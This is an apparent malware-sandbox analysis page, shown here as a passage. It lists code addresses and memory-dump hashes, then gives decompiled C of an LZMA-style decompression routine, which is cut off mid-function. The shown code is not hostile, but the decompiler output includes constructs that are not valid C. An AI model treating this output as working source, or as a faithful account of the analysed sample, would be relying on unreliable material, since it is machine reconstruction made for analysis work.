                                                                                                                              0x0040624a
                                                                                                                              0x0040624c
                                                                                                                              0x0040624c
                                                                                                                              0x0040626e
                                                                                                                              0x00406275
                                                                                                                              0x00406278
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406283
                                                                                                                              0x00406287
                                                                                                                              0x00406947
                                                                                                                              0x00000000
                                                                                                                              0x00406947
                                                                                                                              0x0040628d
                                                                                                                              0x00406290
                                                                                                                              0x00406293
                                                                                                                              0x00406297
                                                                                                                              0x0040629a
                                                                                                                              0x004062a0
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004062b0
                                                                                                                              0x004062b3
                                                                                                                              0x004062b6
                                                                                                                              0x004062b9
                                                                                                                              0x004062bc
                                                                                                                              0x004062bf
                                                                                                                              0x004062c2
                                                                                                                              0x004062c5
                                                                                                                              0x004062c8
                                                                                                                              0x004062cb
                                                                                                                              0x004062ce
                                                                                                                              0x004062e6
                                                                                                                              0x004062e9
                                                                                                                              0x004062ec
                                                                                                                              0x004062ef
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x004062f6
                                                                                                                              0x004062f8
                                                                                                                              0x004062d0
                                                                                                                              0x004062d0
                                                                                                                              0x004062d8
                                                                                                                              0x004062dd
                                                                                                                              0x004062df
                                                                                                                              0x004062e1
                                                                                                                              0x004062e1
                                                                                                                              0x004062fb
                                                                                                                              0x00406302
                                                                                                                              0x00406305
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00406305
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406347
                                                                                                                              0x00406347
                                                                                                                              0x0040634b
                                                                                                                              0x00406953
                                                                                                                              0x00000000
                                                                                                                              0x00406953
                                                                                                                              0x00406351
                                                                                                                              0x00406354
                                                                                                                              0x00406357
                                                                                                                              0x0040635b
                                                                                                                              0x0040635e
                                                                                                                              0x00406364
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406369
                                                                                                                              0x0040636c
                                                                                                                              0x0040636c
                                                                                                                              0x00406372
                                                                                                                              0x00406310
                                                                                                                              0x00406310
                                                                                                                              0x00406313
                                                                                                                              0x00000000
                                                                                                                              0x00406313
                                                                                                                              0x00406374
                                                                                                                              0x00406374
                                                                                                                              0x00406377
                                                                                                                              0x0040637a
                                                                                                                              0x0040637d
                                                                                                                              0x00406380
                                                                                                                              0x00406383
                                                                                                                              0x00406386
                                                                                                                              0x00406389
                                                                                                                              0x0040638c
                                                                                                                              0x0040638f
                                                                                                                              0x00406392
                                                                                                                              0x004063aa
                                                                                                                              0x004063ad
                                                                                                                              0x004063b0
                                                                                                                              0x004063b3
                                                                                                                              0x004063b3
                                                                                                                              0x004063b6
                                                                                                                              0x004063ba
                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x0040678d
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x00000000
                                                                                                                              0x0040679a
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00000000
                                                                                                                              0x0040685b
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00000000
                                                                                                                              0x0040690d
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068bd
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068ef
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                              • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                                              • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                                              • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
